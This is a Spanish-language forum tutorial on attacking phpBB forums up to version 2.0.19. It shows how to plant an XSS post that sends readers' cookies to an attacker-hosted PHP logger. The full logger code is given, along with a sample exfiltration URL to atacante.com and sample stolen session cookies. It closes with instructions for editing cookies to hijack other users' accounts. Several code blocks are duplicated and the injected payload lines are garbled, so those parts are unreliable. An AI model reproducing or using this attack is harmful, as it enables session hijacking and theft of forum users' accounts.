Defacear foros
Bueno esta tecnica es para un foro phpBB menor igual 2.0.19, para robar cookies de cualquier persona que vea tu post...En tu post tenes que agregar esto :
Código:
<pre a='>' b='<pre' >
//f4zh.es.tl/Defacear-foros.htmhttp://www.somesite.com/[/url]</pre>
//f4zh.es.tl/Defacear-foros.htmhttp://www.somesite.com/[/url]</pre>
Donde http://www.milw0rm.com/cookie_stealer.php es la pagina del atacante...
Como se explica esto?
Conseguimos un free hosting(con soporte PHP) en google y lo subimos un archivo que se llame cookie_stealer.php
Dentro de cookie_stealer.php
tiene que estar esto:
Citar
<?php
$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$date=date("j F, Y, g:i a") ;
$referer=getenv ('HTTP_REFERER');
$fp = fopen('cookies.txt', 'a');
fwrite($fp, 'Cookie: '.$cookie.'<br> IP: ' .$ip. '<br> Date and Time: ' .$date. '<br> Referer: '.$referer.'<br><br><br>');
fclose($fp);
?>
$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$date=date("j F, Y, g:i a") ;
$referer=getenv ('HTTP_REFERER');
$fp = fopen('cookies.txt', 'a');
fwrite($fp, 'Cookie: '.$cookie.'<br> IP: ' .$ip. '<br> Date and Time: ' .$date. '<br> Referer: '.$referer.'<br><br><br>');
fclose($fp);
?>
Y en el mismo hosting que conseguimos, en la misma carpeta de cookie_stealer.php, creamos un archivo cookies.txt
Explicacion de proceso
Cuando la persona que vea tu post... se ejecutara el scrip que escribiste en tu post
Código:
<pre a='>' b='<pre' >
[url=]http://www.somesite.com/[/url]</pre>
Esto hace que todos los cookies guardados de esa pagina web se lo envie a http://www.milw0rm.com/cookie_stealer.php.[url=]http://www.somesite.com/[/url]</pre>
Como?
asi c="+document.cookie' b=
toda la cadena de cookies se le iguala a c y lo envia a tu pagina
algo si:
Citar
http://atacante.com/cookie_stealer.php?c=phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs
%3A0%3A%22%22%3Bs%3A6%3A%22userid%22%3Bs%3A3%3A%22873%22%3B%
7D;%20phpbb2mysql_sid=629dff6fbc430aca85b9ad0ee7335e3a;%20phpbb2mysql_t=a%3A
1%3A%7Bi%3A181%3Bi%3A1157380029%3B%7D
%3A0%3A%22%22%3Bs%3A6%3A%22userid%22%3Bs%3A3%3A%22873%22%3B%
7D;%20phpbb2mysql_sid=629dff6fbc430aca85b9ad0ee7335e3a;%20phpbb2mysql_t=a%3A
1%3A%7Bi%3A181%3Bi%3A1157380029%3B%7D
Tu pagina cookie_stealer.php, tomara los valores
$cookie = $_GET['c'];
Y lo guardara en cookies.txt
$fp = fopen('cookies.txt', 'a');
fwrite($fp, 'Cookie: '.$cookie.'<br> IP: ' .$ip. '<br> Date and Time: ' .$date. '<br> Referer: '.$referer.'<br><br><br>');
¿Como procesar esto?
Despues de esperar un momento y que varias personas haya visto tu post....
Abre cookies.txt
tendras algo asi:
Citar
Cookie: phpbb2mysql_data=a:2:{s:11:"autologinid";s:0:"";s:6:"userid";s:3:"861";}; phpbb2mysql_sid=629dff6fbc430aca85b9ad0ee7335e3a; phpbb2mysql_t=a:1:{i:181;i:1157380029;}<br> IP: 208.69.136.33<br> Date and Time: 4 September, 2006, 5:27 pm<br> Referer: http://www.victima.com/foro/viewtopic.php?t=181<br><br><br>Cookie: phpbb2mysql_data=a:2:{s:11:"autologinid";s:0:"";s:6:"userid";s:3:"864";}; phpbb2mysql_sid=629dff6fbc430aca85b9ad0ee7335e3a; phpbb2mysql_t=a:1:{i:181;i:1157380029;}<br> IP: 210.21.236.35<br> Date and Time: 4 September, 2006, 5:27 pm<br> Referer:http://www.victima.com/foro/viewtopic.php?t=181<br><br><br>
Donde esto es lo mas importatne
phpbb2mysql_sid=629dff6fbc430aca85b9ad0ee7335e3a;
phpbb2mysql_data=a:2:{s:11:"autologinid";s:0:"";s:6:"userid";s:3:"864";}
Logearte como un usuario cualquiera y edita tu cookies
phpbb2mysql_sid=629dff6fbc430aca85b9ad0ee7335e3a <---- Nuevo cookies
y en phpbb2mysql_data tu cookies tiene que ser algo asi
a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22%3Bs%3
A6%3A%22userid%22%3Bs%3A3%3A%22879%22%3B%7D <---tu cookies
reemplaza 879 con 864
Quedara asi:
a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22%3Bs%3
A6%3A%22userid%22%3Bs%3A3%3A%22864%22%3B%7D <---nuevo cookies